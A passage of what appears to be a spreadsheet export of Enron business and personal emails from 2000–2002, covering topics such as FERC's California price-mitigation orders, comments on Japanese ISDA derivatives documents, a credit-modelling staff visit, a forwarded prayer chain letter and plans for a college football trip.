Bryan Seyfried/LON/ECT@ECT _x000D_
Subject: Having Iris visit London_x000D_
_x000D_
Hi Amitava,_x000D_
_x000D_
We've been doing some thinking and discussing here regarding the information _x000D_
on our modelling process we'll provide to Darryl Duffie.  We think it would _x000D_
be extremely valuable for Iris to come out to London for a couple weeks to _x000D_
gain a better understanding of the how the models integrate and are truly _x000D_
employed.  I think this would greatly enhance the "product" we'll send to _x000D_
Duffie as well as giving Iris a firm view of Enron Credit.  In addition, she _x000D_
could also explore some of the data sources such as Amadeus and others that _x000D_
might be helpful in private firm modelling.  If we're extremely _x000D_
efficient/lucky in receiving data from D&amp;B or Experian, she might be able to _x000D_
begin analysis on that for the private model efforts._x000D_
_x000D_
I would recommend she plan on coming out for 2 weeks starting the week of 30 _x000D_
Apr perhaps.  Depending on the progress with the private firm data sources, _x000D_
it probably makes sense to send her back to Houston to work on calibration _x000D_
sets with a likely return visit to London as required._x000D_
_x000D_
Please let me know your thoughts._x000D_
_x000D_
Cheers,_x000D_
Scott_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 03:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'angela.barnett@enron.com', 'angela.gill@enron.com', 'jennifer.cutaia@enron.com', 'diane.salcido@enron.com', 'suhernan@llgm.com'})</t>
  </si>
  <si>
    <t>[Fwd: (no subject)]</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 12/12/2000 _x000D_
11:37 AM ---------------------------_x000D_
   Julissa Marron @ ENRON                12/12/2000 10:03 AM_x000D_
_x000D_
To: Angela Mendez/GPGFIN/Enron@ENRON, Marilyn Rivera/HOU/ECT@ECT, Marvia _x000D_
Jefferson/HOU/ECT@ECT, Linda S Bryan/HOU/ECT@ECT, "Becky Beltran" _x000D_
&lt;beckybeltran@hotmail.com&gt;, RGar413489@aol.com, Tiffany La Dang _x000D_
&lt;tiffany@eubanks-architects.com&gt;, Adrial Boals/Corp/Enron@Enron, Judy _x000D_
Hernandez/HOU/ECT@ECT, Faye Ellis/HOU/ECT@ECT, Sandra R _x000D_
McNichols/HOU/ECT@ECT, Regina Blackshear/Corp/Enron@ENRON, Amber _x000D_
Ebow/HOU/ECT@ECT, Bernice Rodriguez/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: [Fwd: (no subject)]_x000D_
_x000D_
Let's pray together again!  We can never pray too much, he loves to hear from _x000D_
us.  _x000D_
May God bless you today and always!_x000D_
_x000D_
Love,_x000D_
Julissa_x000D_
_x000D_
_x000D_
  Let's just give the devil a Holy Ghost Fit!_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;  Father, in the name of Jesus, bless everyone that receives this_x000D_
&gt; &gt;&gt;  message in a special way, open supernatural doors in their life_x000D_
&gt; today,_x000D_
&gt; &gt;&gt;give_x000D_
&gt; &gt;&gt;them a_x000D_
&gt; &gt;&gt;  double portion of your Spirit as we take back everything that_x000D_
&gt; the devil_x000D_
&gt; &gt;&gt;has_x000D_
&gt; &gt;&gt;  stolen from us:_x000D_
&gt; &gt;&gt;  Health_x000D_
&gt; &gt;&gt;  Finances_x000D_
&gt; &gt;&gt;  Children_x000D_
&gt; &gt;&gt;  Jobs_x000D_
&gt; &gt;&gt;  Homes_x000D_
&gt; &gt;&gt;  Marriages, Loved Ones, Friends_x000D_
&gt; &gt;&gt;  Amen._x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;  Let's take time to pray._x000D_
&gt; &gt;&gt;  Take 60 seconds and give this a shot!_x000D_
&gt; &gt;&gt;  Let's just see Satan stop this one._x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;  All you do is:_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;  1) simply say a small prayer for the person who sent you this,_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;  2) then send it on to five other people ... within hours five_x000D_
&gt; &gt;&gt;     people have prayed for you, and you caused a multitude of_x000D_
&gt; people to_x000D_
&gt; &gt;&gt;     pray to God for other people..._x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt;  3) then sit back and watch the power of God work in your life_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 07:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Oneok</t>
  </si>
  <si>
    <t>I need to see the GTY,  Thanks_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 04:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'john.lavorato@enron.com', 'philippe.bibi@enron.com', 'beth.perlman@enron.com', 'sally.beck@enron.com'})</t>
  </si>
  <si>
    <t>IT Budget - Meeting</t>
  </si>
  <si>
    <t>Guys, I would like to schedule a one hour meeting to discuss the 2000 and _x000D_
2001 IT budget.  Essentially, I would like this first meeting to discuss our _x000D_
approach to a) understanding in some detail our 2000 costs and the _x000D_
nature/behaviour of those costs and b) in this context, ENA's priorities and _x000D_
the system plan, come up with the 2001 budget and how the accountability will _x000D_
be managed._x000D_
_x000D_
Kay, can you please try to organize ASAP._x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janel.guerrero@enron.com', 'mpalmer@enron.com', 'harry.kingerski@enron.com', 'sandra.mccubbin@enron.com', 'karen.denne@enron.com', 'susan.mara@enron.com', 'leslie.lawner@enron.com'})</t>
  </si>
  <si>
    <t>Summary of the Wednesday FERC Orders</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 04/26/2001 10:30 AM -----_x000D_
_x000D_
=09Alan Comnes@ECT_x000D_
=0904/26/2001 01:10 AM_x000D_
=09=09_x000D_
=09=09 To: Tim Belden/HOU/ECT@ECT, Mike Swerzbin/HOU/ECT@ECT, Michael M=20_x000D_
Driscoll/PDX/ECT@ECT, Matt Motley/PDX/ECT@ECT, Robert Badeer/HOU/ECT@ECT,=_x000D_
=20_x000D_
Diana Scholtes/HOU/ECT@ECT, Sean Crandall/PDX/ECT@ECT, Chris=20_x000D_
Mallory/PDX/ECT@ECT, Jeff Richter/HOU/ECT@ECT, Tom Alonso/PDX/ECT@ECT, Mark=_x000D_
=20_x000D_
Fischer/PDX/ECT@ECT, Phillip Platter/HOU/ECT@ECT, Carla Hoffman/PDX/ECT@ECT=_x000D_
,=20_x000D_
Christopher F Calger/PDX/ECT@ECT, Michael Etringer/HOU/ECT@ECT, Steve C=20_x000D_
Hall/PDX/ECT@ECT, Christian Yoder/HOU/ECT@ECT, Tim Heizenrader/PDX/ECT@ECT,=_x000D_
=20_x000D_
Stephen Swain/PDX/ECT@ECT, Jeff Dasovich/NA/Enron@Enron, Susan J=20_x000D_
Mara/NA/Enron@ENRON, Joe Hartsoe/Corp/Enron@ENRON, Ray=20_x000D_
Alvarez/NA/Enron@ENRON, Elliot Mainzer/PDX/ECT@ECT, Bill Williams=20_x000D_
III/PDX/ECT@ECT, James D Steffes/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Summary of the Wednesday FERC Orders_x000D_
_x000D_
The FERC orders will not be out until sometime Thursday but here is a boile=_x000D_
d=20_x000D_
down version of what we heard from the meeting, the press, and the press=20_x000D_
release:_x000D_
_x000D_
FERC Market Monitoring and Mitigation Plan for California_x000D_
_x000D_
? Approved 2-1 with Massey dissenting_x000D_
? Imposes mitigation (caps) in R/T in California only during Stage 1/2/3=20_x000D_
beginning _____ (not clear; assume immediately or soon)._x000D_
o  Applies to all thermal generation with a PGA with ISO (even if not a FER=_x000D_
C=20_x000D_
jurisdictional entity)_x000D_
o  All subject generation is paid a single proxy price_x000D_
o  Proxy price is based upon the marginal unit=01,s gas price x heat rate +=_x000D_
=20_x000D_
emission adder.  (Heat rate determining cap will not longer be pegged at=20_x000D_
18,000 but will change daily and posted by CAISO)_x000D_
o  Proxy price is determined on a day-ahead basis   Still not clear what ga=_x000D_
s=20_x000D_
price will be used.=20_x000D_
o  Bids above the proxy are allowed but the seller must justify the cost_x000D_
? Hydroelectric resources--in-state or out-of-state--are exempt._x000D_
? CAISO will still acquire resources outside of the proxy price via OOM cal=_x000D_
ls_x000D_
? Silent on exports and expect CAISO to cut exports unless ordered to do=20_x000D_
otherwise. (However, requirement for CAISO to become a part of a =01&amp;real=_x000D_
=018 RTO=20_x000D_
would imply that it must honor firm schedules.)_x000D_
? All LSE in R/T markets to submit demand bids and to identify load that ca=_x000D_
n=20_x000D_
be curtailed at a specified price_x000D_
? Contingent on CAISO filing a plan to become part of a region wide RTO by=_x000D_
=20_x000D_
June 1.  I.e., if CAISO does not make an adequate showing, all mitigation=_x000D_
=20_x000D_
measures are cancelled._x000D_
? Opens an investigation on a subset of transactions.  According to Massey=_x000D_
=20_x000D_
this band is very narrow._x000D_
? The $150 breakpoint and reporting requirements, which were put into effec=_x000D_
t=20_x000D_
with the December order, will end with this order.=20_x000D_
? In all hours (not just emergencies) there is increased market monitoring =_x000D_
of=20_x000D_
outages and bidding behavior_x000D_
? Although the plan is only for California, it seeks comments on a West-wid=_x000D_
e=20_x000D_
price mitigation plan._x000D_
? Also seeks comments on whether CAISO should impose an adder to address=20_x000D_
generator unpaid bills._x000D_
_x000D_
_x000D_
RTO West:_x000D_
_x000D_
? RTO West Phase 1 filing (made back in Nov 2000) is accepted._x000D_
_x000D_
? TransConnect, a Transco proposed by RTO West's transmission-owning IOUs,=_x000D_
=20_x000D_
was also accepted. =20_x000D_
_x000D_
? Incentive rates allowed if owner separates transmission from the generati=_x000D_
on._x000D_
_x000D_
? Phase 2 filing due December 1.   This filing will require tariffs and=20_x000D_
additional details including how RTO West can become part of a larger=20_x000D_
West-wide RTO_x000D_
_x000D_
? Order encourages Canadian utilities to be a part of RTO West_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 22:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.musch@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Re: Japanese ISDA Documents</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mark,_x000D_
_x000D_
Thanks for your response.  Sorry, I didn't provide you my number here in _x000D_
Tokyo.  For future reference, my office number is 81-3 5219-4578.  I'll try _x000D_
to give you a ring Wednesday morning (Houston time) to discuss the going _x000D_
forward strategy. _x000D_
_x000D_
 Attached hereto, are the draft documents, modified in accordance with your _x000D_
comments/questions and my responsive comments (which are set forth below in _x000D_
red)._x000D_
_x000D_
Look forward to seeing you soon._x000D_
_x000D_
Hi Susan-_x000D_
_x000D_
Please review the attached documents from the tax perspective.  Thanks._x000D_
_x000D_
Best regards,_x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Mark Taylor@ECT_x000D_
	08/22/2000 06:59 PM_x000D_
		 _x000D_
		 To: John Viverito/Corp/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Japanese ISDA Documents_x000D_
_x000D_
Dear John:_x000D_
_x000D_
So sorry for the delay.  I hope it hasn't caused too much inconvenience. No _x000D_
problem!  I would have called to apologize in person but believe it or not I _x000D_
don't have your phone number!   Here are my comments to the draft documents _x000D_
you sent:_x000D_
_x000D_
Part 1 (b)  In our other derivatives trading, the cross default test applies _x000D_
to Enron Corp. with a Threshold of US$100,000,000.  To accomplish this in the _x000D_
schedule, Threshold Amount for the Enron party would apply to our Credit _x000D_
Support Provider if there is going to be an Enron Corp. guaranty and the _x000D_
dollar figure adjusted accordingly.  The Schedule has been revised.  Please _x000D_
advise if the equivalent change should be made to paragraph (b)(iv)(B) of _x000D_
paragraph 13 of the CSA._x000D_
_x000D_
Part 1 (d)  Has Baker &amp; McKenzie recommended this?  We rely on local counsel _x000D_
advice for this provision but our preference is that the termination in a _x000D_
bankruptcy context not be automatic unless it needs to be.  The risk in the _x000D_
automatic situation is that the market moves significantly before we are even _x000D_
aware of the situation, i.e. the outstanding transactions terminate _x000D_
automatically, leaving us with an open, unhedged position which we are not _x000D_
able to protect since we are not aware of it.  In the U.S. the bankruptcy _x000D_
code allows us to terminate after the filing of a bankruptcy according to the _x000D_
terms of the agreement so we know exactly the time to rehedge.   According to _x000D_
B&amp;M, the ability to set-off against Japanese counterparties is limited by _x000D_
certain laws relating to insolvency including the Bankruptcy Law.  These laws _x000D_
give a trustee the right to cherry pick contracts.  Accordingly, it is the _x000D_
general practice in Japan for parties to elect automatic early termination to _x000D_
ensure that close out netting takes place before the trustee's right to _x000D_
cherry pick comes into effect.  In December 1998, a netting law came into _x000D_
effect in Japan which specifically permits close out netting (notwithstanding _x000D_
the trustee's right to cherry pick).  The netting law only applies where one _x000D_
of the parties to the transaction is a financial institution (Mitsui Marine _x000D_
and Fire, Sanwa and IBJ, would all qualify).  From a legal perspective, it is _x000D_
now arguable that automatic early termination should not be adopted (for the _x000D_
same reasons as are described in you message).  However, as a matter of _x000D_
Japanese market practice, B&amp;M has advised that most schedules with Japanese _x000D_
counterparties still specify automatic early termination.  Accordingly, the _x000D_
automatic early termination provision in place.  Please confirm that this is _x000D_
acceptable.  Please also note, that the automatic early termination provision _x000D_
will be necessary when Enron Japan deals with Japanese corporations that are _x000D_
not financial institutions._x000D_
_x000D_
Part 1 (e)  We usually choose Loss here as the method which gives the _x000D_
non-defaulting party the most flexibility.  Market Quotation is often _x000D_
suggested because of its apparent objective nature.  However, in many of the _x000D_
markets where we operate, quotations will not be available, where they are _x000D_
available they may well not be meaningful, and the Loss method gives _x000D_
flexibility (while still requiring commercial reasonableness).  The Schedule _x000D_
has been revised._x000D_
_x000D_
Part 1 (h)(ix)  This Additional Event of Default only applies when there is _x000D_
no collateral annex.   When we have the ability to ask for (or be asked for) _x000D_
collateral in the case of a downgrading, we build that event into the _x000D_
Paragraph 13 to trigger a reduction of the threshold to zero which requires _x000D_
the posting of collateral to cover any open position.  If the party fails, it _x000D_
then becomes a default allowing termination.  The Schedule has been revised._x000D_
_x000D_
Part 1 (h)(x)  Wouldn't the cross default be triggered before this could _x000D_
happen?  B&amp;M has advised that although the cross default provisions may well _x000D_
be triggered before this clause applies, the clause is standard in Japan and _x000D_
is not detrimental to Enron, therefore the clause has been left in place._x000D_
_x000D_
Part 2  Have our internal Tax people approved this?  I have copied Susan _x000D_
Musch on this e-mail, so that she may review the documents for tax purposes._x000D_
_x000D_
Part 3  I am not familiar with the Representative Director concept or some of _x000D_
the corporate documents referred to.  Since Enron Corp. will be a Credit _x000D_
Support Provider, does it have a Representative Director, etc.?  The clause _x000D_
has been modified to allow different documents to be specified in connection _x000D_
with the Enron Corp. guarantee.  Please fill in the blanks to specify the _x000D_
appropriate documents.  Sorry for the oversight._x000D_
_x000D_
The legal opinion requirement is one that we can waive if local counsel does _x000D_
not think it necessary.  In many non-US jurisdictions, local counsel have _x000D_
advised that an opinion be obtained - in some cases derivatives transactions _x000D_
are so uncommon that they might be outside the ordinary course of business _x000D_
and therefore require special board approval; in others, derivatives would _x000D_
not be permissible activities for a company unless express provision is made _x000D_
in the corporate documents, etc.  B&amp;M has stated that in practice they have _x000D_
never been given or asked to review a Japanese law opinion in relation to a _x000D_
specific ISDA schedule entered into by a Japanese counterparty and would _x000D_
expect Japanese counterparties to be reluctant to provide such opinions._x000D_
_x000D_
Part 5 (b) (g)&amp;(h) These representations originate with CFTC rules in mind _x000D_
(although they may be helpful for other reasons as well).  If neither party _x000D_
is in the US, the CFTC reason may go away.  On the other hand, since we are _x000D_
choosing New York law to apply the argument might be made that US federal law _x000D_
applies as well.  If that is our theory, there are additional representations _x000D_
(the Eligible Swap Participant reps) that we should think about putting back _x000D_
in.   These representations were tailored with the Japanese prohibition on _x000D_
gambling in mind. I was not able to find the "eligible swap participant" _x000D_
representation in the Enron US ISDA Form (although there is a reference to _x000D_
this in the opinion).  Please inform me as to the wording that needs to be _x000D_
added for New York purposes._x000D_
_x000D_
Part 5 (d)  We are currently evaluating whether we should revise this section _x000D_
to make reference to the ISDA 2000 definitions.  While I think we will get _x000D_
there, we haven't actually made the decision yet.  So far I guess we leave it _x000D_
the way it is.  OK_x000D_
_x000D_
Part 5 (j)  My only concern here is with the value of the Enron Corp. _x000D_
guaranty as a form for a guaranty from a Japanese entity.  Any differences in _x000D_
Japan from US practice we should be worried about?  For the swap _x000D_
counterparties currently being considered by Enron (Mitsui Marine, IBJ and _x000D_
Sanwa) no guarantees are being required.  B&amp;M has advised, the form of the _x000D_
Enron Corp. guarantee would generally be acceptable for guaranteeing the _x000D_
obligations of Japanese counterparties.  However, there are a number of _x000D_
changes that may be considered including switching the governing law and _x000D_
jurisdiction provisions to Japan for ease of enforcement against parties _x000D_
whose principal assets are located in Japan.  It is recommended that the _x000D_
guarantee be reviewed in further detail before it is actually proposed to _x000D_
counterparties._x000D_
_x000D_
Paragraph 13  I have to admit I'm not as familiar with the Paragraph 13 _x000D_
provisions as the Schedule.  My only concern here is with the MAC clause and _x000D_
it looks like there's a glitch in the form.  It seems to me that if the _x000D_
counterparty is only rated by one of the 2 major agencies we shouldn't be _x000D_
pegged with a MAC if only one of our agencies stops rating us.  The way it is _x000D_
drafted now if either S&amp;P or Moody's stops rating us, even if the remaining _x000D_
rating is very high we will have a MAC occur.  The counterparty doesn't have _x000D_
to worry about Moody's at all.  Just a thought.  The suggested change has _x000D_
been made.  Additionally, the provision has been modified to provide that a _x000D_
MAC will occur with respect to Enron, only if both rating agencies downgrade _x000D_
Enron Corp.  Please confirm this is OK._x000D_
_x000D_
On the guaranty, you will need to run the choice of law and jurisdiction _x000D_
changes past Clement Abrams at Corp. Legal.  My only comment is that we would _x000D_
usually have a cap that is a bit higher (in this case maybe an extra _x000D_
$5,000,000) than the threshold in the CSA - that gives the counterparty a _x000D_
little wiggle room if we fail to post collateral after the threshold is _x000D_
exceeded.  I will separately forward the guaranty to Clement Abrams for his _x000D_
approval. The cap has been increased to US$20,000,000._x000D_
_x000D_
Tana is preparing a red-line for me that hopefully will show all of the _x000D_
changes between the US form and the Japan form.  I may have a few more _x000D_
comments after I see how that comes out but don't expect many.  I apologize _x000D_
that the red-line was not fully made against the US form. _x000D_
_x000D_
I hope this is helpful.  Mark-  This has been very helpful! Please feel free _x000D_
to call and we can walk through these over the phone if that would be _x000D_
useful.  We should also talk about the most efficient way to prepare these _x000D_
going forward.  It might make sense for Credit to send their worksheets to _x000D_
the paralegals here for a first draft which would then go to you for review _x000D_
before going to the counterparty.  It may slow things down by a day or two _x000D_
but it would free you up to work on other things.  All excellent ideas._x000D_
_x000D_
We're looking forward to having you back.  Looking forward to seeing you _x000D_
soon.  Thanks again._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 06:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kjobrien@duke-energy.com'})</t>
  </si>
  <si>
    <t>Re: Football!</t>
  </si>
  <si>
    <t xml:space="preserve">Trust me, I know about being swamped.  I was here until 8:30 last night.  The_x000D_
homecoming game is a good choice.  I'll be going in on Thursday evening _x000D_
because_x000D_
I'm planning to run in the 2 mile Gator Gallop fun run on Friday morning.  The_x000D_
run is followed by the homecoming parade and then Gator Growl is Friday night._x000D_
Gator Growl is the largest student run pep rally in the country and they _x000D_
always_x000D_
have two or three nationally recognized comedians.  The game is Sat and then _x000D_
we_x000D_
could fly home on Sun on either the 7:00 a.m. that arrives at 8:30 (this is _x000D_
the_x000D_
flight I usually take even though it means getting up early on Sun) or the _x000D_
12:25_x000D_
that arrives at 1:50.  I usually fly in and out of Jacksonville.  I've _x000D_
checked a_x000D_
number of flights today and you could fly in any time on Thurs or Fri and out _x000D_
on_x000D_
Sun for $196.  Not too bad.  I'll pick up the rental car costs and we can stay_x000D_
at my brother's (college apt, but it will work for a night or two).  Let me _x000D_
know_x000D_
what you want to do.  I'll probably book my flight today or tomorrow to get _x000D_
this_x000D_
cheap rate._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gerald.Nemec@enron.com on 09/20/2000 12:01:23 PM_x000D_
_x000D_
To:   Kelly OBrien/NorthAmerica/EnergyServices@DukePower_x000D_
cc:_x000D_
Subject:  Re: Football!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hi Kelly,    Sorry I haven't gotten back to you sooner, but have been_x000D_
swamped.  I am thinking the South Carolina game works.  However, what does_x000D_
a flight to Florida cost?  I need to factor that in as well, as I am_x000D_
planning on going to Spain in November and probably need to watch my $$$._x000D_
_x000D_
I have been to several OU games in Dallas, and it is actually more fun than_x000D_
the A&amp;M game because they split the stadium 50/50 Texas OU.  It is pretty_x000D_
intense.  I am trying to get tickets to the game this year and will_x000D_
probably go._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Kelly OBrien"_x000D_
                    &lt;kjobrien@duke-e        To:     gerald.nemec@enron.com_x000D_
                    nergy.com&gt;              cc:_x000D_
                                            Subject:     Football!_x000D_
                    09/18/2000 10:53_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Okay, here's the rest of the Gators' home schedule and the Longhorns'_x000D_
schedule_x000D_
for comparison._x000D_
_x000D_
          Gators              Longhorns_x000D_
Oct 7          LSU            Oklahoma in Dallas_x000D_
Oct 14         Auburn              at Colorado_x000D_
Nov 11         South Carolina      at Kansas_x000D_
_x000D_
Do you go to the game Oklahoma game in Dallas?  I went one year and it was_x000D_
a lot_x000D_
of fun._x000D_
_x000D_
So, if you have any desire to do this swap, let me know._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 2 Mar 2000 06:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bperron@columbiaenergy.com', 'jeff.westover@enron.com'})</t>
  </si>
  <si>
    <t>CES purchases for Jan</t>
  </si>
  <si>
    <t xml:space="preserve">Call me if you have questions._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 06:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.shults@enron.com', 'lucy.ortiz@enron.com', 'kate.symes@enron.com', 'charles.decker@enron.com', 'janice.moore@enron.com', 'christian.yoder@enron.com', 'mark.fischer@enron.com', 'rhonda.denton@enron.com', 'adriane.moratto@enron.com', 'genia.fitzgerald@enron.com', 'david.vitrella@enron.com', 'andrea.hauser@enron.com', 'mary.gosnell@enron.com', 'justin.rostant@enron.com', 'homer.lin@enron.com', 'bryan.hull@enron.com', 'kim.theriot@enron.com', 'connie.sutton@enron.com', 'dan.mccairns@enron.com', 'tyesha_woods@pgn.com', 'bob.schorr@enron.com', 'janet.moore@enron.com', 'elizabeth.sager@enron.com', 'brad.horn@enron.com', 'derenda.plunkett@enron.com', 'jeff.richter@enron.com', 'daniel.diamond@enron.com', 'harry.bucalo@enron.com', 'ted.murphy@enron.com', 'gregory.schockling@enron.com', 'shari.stack@enron.com', 'george.hope@enron.com', 'lesli.campbell@enron.com', 'carla.hoffman@enron.com', 'john.zurita@enron.com', 'robert.shiring@enron.com', 'monica.lande@enron.com', 'suneet.sharma@enron.com', 'beth.cowan@enron.com', 'ragan.vaughan@bhld.com', 'valarie.sabo@enron.com', 'jubran.whalan@enron.com', 'david.portz@enron.com', 'lisa.gillette@enron.com', 'richard.ring@enron.com', 'teresa.mandola@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>REVISED Updated Power Credit Watchlist</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find a REVISEDupdated power credit watchlist dated 12/11/00.  _x000D_
Please direct any comments/questions to the credit hotline, (713) 853-1803_x000D_
_x000D_
Veronica Gonzalez_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 22:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: APEA/Clark County PUD</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to call you this week about this, but I understand from your _x000D_
voicemail that you are out. Then I ran into Jeff and he said it was being _x000D_
handled and that there was nothing for me to do. I will be in Portland next _x000D_
week if you want to talk about this matter. As far as the request to Avista, _x000D_
I think that we should make such a request, preferably from our business _x000D_
contact--a short and sweet letter should do._x000D_
_x000D_
_x000D_
_x000D_
	Dale Rasmussen_x000D_
	01/04/2001 03:11 PM_x000D_
		 _x000D_
		 To: Jeffrey T Hodge/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: APEA/Clark County PUD_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
Re-sending.  Hopefully you can print this one._x000D_
_x000D_
In connection with the APEA matter, we have been informed that Avista (Avista _x000D_
manages Clark County PUD's gas supplies for its facility) has transaction _x000D_
tapes related to Clark's declaration of force majeure that may be of _x000D_
interest.  _x000D_
_x000D_
It is possible that we should send a request to Avista to retain the tapes _x000D_
for the dates 12-6-00 through today in case a dispute arises over the _x000D_
declaration of force majeure.  Do you think that would be prudent, and if so, _x000D_
how would you like to go about making the request?_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Apr 2002 03:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.ruiz@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'melinda.hood@enron.com'})</t>
  </si>
  <si>
    <t>Monfort 1.5</t>
  </si>
  <si>
    <t>The VisuPro download for Monfort is on the Zoom network:_x000D_
ScadaData:\\Monfort\2002\Apr\Apr10\_x000D_
_x000D_
Data sets for Apr 5_x000D_
  Apr 8_x000D_
  Apr 10_x000D_
_x000D_
-John</t>
  </si>
  <si>
    <t>Wed, 19 Jul 2000 09:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.merrill@enron.com'})</t>
  </si>
  <si>
    <t>Re: Singapore Telecom Competition Code - Second Draft</t>
  </si>
  <si>
    <t xml:space="preserve">David - well done on the legislative change regarding bandwidth.   mcs_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David Merrill@ENRON_DEVELOPMENT_x000D_
13/07/2000 09:39_x000D_
To: donald_lassere@enron.net_x000D_
cc: james_row@enron.net, Nicole Palczer@ENRON COMMUNICATIONS, Mark _x000D_
Schroeder@ECT, Scott Bolton@ENRON COMMUNICATIONS, Colin Jackson@ECT, Sarah _x000D_
Goodpastor@ENRON COMMUNICATIONS _x000D_
_x000D_
Subject: Singapore Telecom Competition Code - Second Draft_x000D_
_x000D_
_x000D_
Bandwidth Trading_x000D_
_x000D_
The second draft of the Singapore competition code did add a reference to _x000D_
bandwidth trading,_x000D_
as we suggested.   The drafters chose to put the reference in the section on _x000D_
the competition _x000D_
regime, as an example of agreements that do not restrict competition.    _x000D_
_x000D_
   Under Section 8 of the draft Code, which deals primarily with agreements _x000D_
between licensees _x000D_
   that unreasonably restrict competition, there is a subsection dealing with _x000D_
"Exceptions for _x000D_
   Agreements Necessary for Legitimate Collaborative Ventures".   That _x000D_
section says:_x000D_
_x000D_
   "Nothing [in this Code containing various prohibitions on restrictions of _x000D_
competition] ... prohibits_x000D_
   agreements amongst Licensees that enter into an efficiency- enhancing _x000D_
integration of economic_x000D_
   activity, where such agreement is no broader than necessary to achieve the _x000D_
pro-competitive_x000D_
   benefit.  For example, if competing licensees establish a joint purchasing _x000D_
or production venture,_x000D_
   which is designed to increase total output and lower prices, the two _x000D_
parties could agree regarding_x000D_
   the prices to be paid by the joint venture.   Similarly, if competing _x000D_
Licensees were to establish a_x000D_
   market for trading bandwidth, the Licensees could exclude competitors that _x000D_
did not agree to _x000D_
   certain standardized terms, if those terms are necessary to allow for the _x000D_
efficient operation if_x000D_
   the market."_x000D_
_x000D_
This seems to accomplish our purpose of referencing bandwidth trading in the _x000D_
code as a  _x000D_
worthy concept in Singapore, and does not restrict bandwidth trading to the _x000D_
situation used_x000D_
in the example._x000D_
_x000D_
Other changes in the second draft of the Code:_x000D_
_x000D_
-  Definition of dominant carrier changed:   _x000D_
_x000D_
            Rather than depending on market power in a specific service, _x000D_
dominant definition _x000D_
            of a carrier will relate to its control of last-mile facilities; _x000D_
ability to raise end-user prices_x000D_
            and/or reduce output; and cost or difficulty of  replicating _x000D_
facilities.   _x000D_
_x000D_
            Dominant carriers initially are still Singtel (wireline license _x000D_
only), SCV, and 1-Net._x000D_
_x000D_
-  Process for licensees to get interconnection agreements with Dominant _x000D_
Licensees accelerated_x000D_
            and new entrants given options for interconnecting with Dominant _x000D_
Licensees_x000D_
            even while negotiations ongoing so that DL's cannot stall new _x000D_
entrant operations._x000D_
_x000D_
-  Changes in unbundling requirements for dominant carriers._x000D_
_x000D_
-  Competition law regime strengthened._x000D_
_x000D_
Schedule:   _x000D_
_x000D_
   The Code will be released Sept 1 and will become effective Sept 15.   _x000D_
Dominant_x000D_
   Licensees have to file Reference Interconnection Offers by Oct 15 and they_x000D_
   will become effective Dec 15._x000D_
_x000D_
DM _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
